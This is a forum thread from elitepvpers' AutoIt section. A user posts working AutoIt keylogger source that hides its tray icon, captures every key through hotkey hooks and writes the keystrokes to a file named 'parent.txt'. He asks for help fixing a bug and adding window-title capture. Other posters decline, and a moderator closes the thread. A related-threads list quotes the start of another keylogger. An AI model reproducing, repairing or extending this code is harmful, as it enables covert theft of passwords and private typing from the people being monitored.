Register for your free account! | Forgot your password?

Go Back   elitepvpers > Coders Den > AutoIt
You last visited: Today at 15:55

  • Please register to post and access all features, it's quick, easy and FREE!

Advertisement



Autoit keylogger [effective]

Discussion on Autoit keylogger [effective] within the AutoIt forum part of the Coders Den category.

Closed Thread
 
Old   #1
 
elite*gold: 0
Join Date: May 2010
Posts: 18
Received Thanks: 2
Autoit keylogger [effective]

Hi. I got a great little keylogger code here, that gets all the keys, even special symbols like !"#¤%&/(

the problem is: when you make a @, it will mess up the keyboard, and will not type any keys, only stuff like: €, (even you stop the script)
It then solves the problem by logging out, or pressing alot of keys.

can someone help me find a solution to that problem ?

Quote:
#NoTrayIcon
#include <Misc.au3>
_Singleton("olol",0)
For $i = 0 To 256
HotKeySet(Chr($i), "Capt")
Next
FileWrite("parent.txt", @CRLF & "start of parent logger " & @HOUR & ":" & @MIN & ":" & @SEC & " le " & @MDAY & "/" & @MON & "/" & @YEAR & @CRLF & @CRLF)
$i = 0
While 1
sleep(1000)
WEnd
Func Capt()
FileWrite("parent.txt", @HotKeyPressed)
HotKeySet(@HotKeyPressed)
Send(@HotKeyPressed)
HotKeySet(@HotKeyPressed, "Capt")
EndFunc ;==>Capt
spymare is offline  
Old 06/09/2012, 02:01   #2
 
~.ScoiL's Avatar
 
elite*gold: 70
Join Date: Jul 2011
Posts: 496
Received Thanks: 194
Viruses or any things in this direction is not supported in the forum here.
~.ScoiL is offline  
Old 06/09/2012, 02:04   #3
 
elite*gold: 0
Join Date: May 2008
Posts: 163
Received Thanks: 10
Just use ur brain and u can fix it by urself
ŠemŲlitiŲn is offline  
Old 06/09/2012, 09:19   #4
 
elite*gold: 0
Join Date: May 2010
Posts: 18
Received Thanks: 2
I really tried to fix it, but can't Would appreciate alot if someone could help me out fixing it
also if it could get the window title, it would be really great
spymare is offline  
Old 06/09/2012, 14:50   #5


 
Lawliet's Avatar
 
elite*gold: 2
Join Date: Jul 2009
Posts: 14,456
Received Thanks: 4,685
#closed
Lawliet is offline  
Closed Thread


Similar Threads Similar Threads
NosTale Keylogger entdecken AutoIT
04/05/2012 - Nostale - 2 Replies
Hallo leute habe nen programm gefunden mit dem man autoIT dateien durchsuchen kann auf keylogger usw. Dieses programm nennt sich AutoIT Decompiler allso fals ihr euch nicht sicher seid,könnt ihr das von nun an checken. Einfach entpacken (winrar) Und dann die autoIT in die anwendung ziehen nun erhaltet ihr die gescriptete datei in dem ornder wo ihr die datei gehabt hattet. So nun könnt ihr easy NosTale keylogger usw finden
NosTale Keylogger entdecken AutoIT !
04/05/2012 - Nostale - 1 Replies
Close hab vergessen die datei anzuhängen mache neuen threadd
Mit AutoIT Keylogger erstellen.
03/10/2010 - Main - 2 Replies
Jo Abend leute wie oben geschrieben wollte ich euch fragen ob man mit AutoIt man Keylogger basteln kann bzw. machen kann oder geht das nur mit c++ und diesen anderen hochsprachen ?
Autoit Keylogger
06/11/2009 - AutoIt - 3 Replies
Ich habe mal mit meinem Cousen versucht einen Keylogger versucht zu scripten. Was dabei rausgekommen?, unten der quellcode. Ich habe den unkomplizierten teil gemacht er den komplizierten also fragt mich nicht wie er das hinbekommen hat *g* Download von Autoit: AutoIt v3 - Downloads Code #NoTrayIcon Local $date = @YEAR & "-" & @MON & "-" & @MDAY Local $user32 = DllOpen("user32"), $log



All times are GMT +2. The time now is 15:55.


Powered by vBulletin®
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.
SEO by vBSEO ©2011, Crawlability, Inc.
This site is protected by reCAPTCHA and the Google Privacy Policy and Terms of Service apply.

Support | Contact Us | FAQ | Advertising | Privacy Policy | Terms of Service | Abuse
Copyright ©2024 elitepvpers All Rights Reserved.